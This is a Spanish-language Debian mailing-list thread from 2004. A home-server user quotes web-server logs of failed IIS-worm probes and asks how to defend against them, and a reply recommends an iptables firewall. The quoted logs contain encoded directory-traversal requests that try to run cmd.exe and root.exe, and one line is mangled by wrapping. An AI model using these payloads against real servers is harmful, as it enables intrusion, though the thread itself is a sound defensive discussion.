En realidad lo que tenés que hacer es correrte un script iptables cuando
te conectás, de modo que tus puertos queden protegidos por un firewall.
Leete el iptables-howto de linuxdoc.org y cualquier cosa que no
esntiendas preguntá.
Sds

On Sun, Feb 08, 2004 at 12:22:28PM +0100, Raúl Hernández wrote:
> Hola a [EMAIL PROTECTED],
> 
> tengo un servidor web montado con boa (sencillo y eficaz) para poder
> ver la documentación de Debian desde Mozilla con dwww.
> 
> Esta máquina también hace de pasarela de mi mini-red local conectando
> por ppp a inet.
> 
> Hoy me ha dado por revisar los logs de bos y me encuentro:
> 
> 62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET /scripts/root.exe?/c+dir 
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET /MSADC/root.exe?/c+dir 
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET
> 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 62.147.188. HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
> "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 
> Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que
> esto viene del exterior.
> 
> ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el
> futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos
> son WINDOG y no existen en mi sistema.
> 
> ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf
> para evitar estos temas?
> 
> También tengo las directivas en /etc/hosts.deny:
>       ALL: PARANOID
>       ALL: ALL
> y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo
> que no me explico cómo han podido acceder desde inet siendo IPs fuera
> del rango permitido.
> 
> Gracias y ...
> -- 
> Un saludo.
> Raúl Hernández <[EMAIL PROTECTED]>
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

Fernando M. Maresca

Cel: (54) 221 15 502 3938
Cel: 0221-15-502-3938

Responder a